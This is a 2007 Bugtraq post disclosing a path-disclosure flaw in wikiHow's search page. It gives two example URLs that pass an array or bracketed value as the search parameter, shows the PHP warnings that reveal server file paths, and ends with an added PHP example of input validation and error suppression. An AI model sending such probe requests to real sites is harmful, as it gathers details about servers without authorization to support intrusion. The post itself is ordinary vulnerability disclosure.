Date: 20 Jan 2007 23:02:19 -0000
From: iamtheevil1@...il.com
To: bugtraq@...urityfocus.com
Subject: Wiki-how path disclosure

The search function of wikihow is vulnerable to path disclosure when an array type is given as a search parameter.

Example: http://www.wikihow.com/Special:LSearch?search[]=pie&fulltext=Search
yields:
Warning: urlencode() expects parameter 1 to be string, array given in /var/www/html/wiki16/includes/SpecialLSearch.php on line 56

Warning: Illegal offset type in isset or empty in /var/www/html/wiki16/includes/Title.php on line 123

Warning: Illegal offset type in /var/www/html/wiki16/includes/Title.php on line 146

Warning: urlencode() expects parameter 1 to be string, array given in /var/www/html/wiki16/includes/SpecialLSearch.php on line 124

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /var/www/html/wiki16/skins/WikiHowSkin.php on line 1468

Also, when an array is given as a search type, the function Fatal error: Call to a member function getArticleID() yields another path disclosure, as seen here: http://www.wikihow.com/Special:LSearch?search=%5B%5D&fulltext=Search

Fatal error: Call to a member function getArticleID() on a non-object in /var/www/html/wiki16/includes/SpecialLSearch.php on line 91

It is not known at this time if other wiki systems are vulnerable to the same thing. If they are, drop me a line.
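
Added example, not part of the original post and not wikiHow or MediaWiki code: one way a PHP search handler can avoid both failure modes reported above, by rejecting a non-string `search` parameter, checking a failed lookup before using its result, and keeping diagnostics out of the response. The function names and the title rule are hypothetical; `display_errors` and `log_errors` are standard PHP settings.

```php
<?php
// Added example. Function names and the title rule are hypothetical.

// Keep PHP warnings and fatal errors (which include file paths) out of
// HTTP responses; record them in the server log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Return the search term, or null when it is missing, empty, or was
// submitted as an array (search[]=...), so urlencode() never sees an array.
function get_search_term(array $query): ?string
{
    if (!isset($query['search']) || !is_string($query['search'])) {
        return null;
    }
    $term = trim($query['search']);
    return $term === '' ? null : $term;
}

// Stand-in for a title lookup that can fail. Constructed rule: text
// containing brackets or similar characters is not a valid title.
function lookup_title(string $term): ?array
{
    if (preg_match('/[\[\]{}<>|#]/', $term)) {
        return null;
    }
    return ['text' => $term];
}

function handle_search(array $query): string
{
    $term = get_search_term($query);
    if ($term === null) {
        return 'Please enter a search term.';
    }
    $title = lookup_title($term);
    if ($title === null) { // guard before using the lookup result
        return 'No results for ' . htmlspecialchars($term, ENT_QUOTES, 'UTF-8');
    }
    return 'Searching for ' . htmlspecialchars($title['text'], ENT_QUOTES, 'UTF-8')
        . ' (q=' . urlencode($term) . ')';
}

// Constructed inputs mirroring the two request shapes in the report,
// followed by an ordinary search.
foreach ([['search' => ['pie']], ['search' => '[]'], ['search' => 'pie']] as $q) {
    echo handle_search($q), PHP_EOL;
}
```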
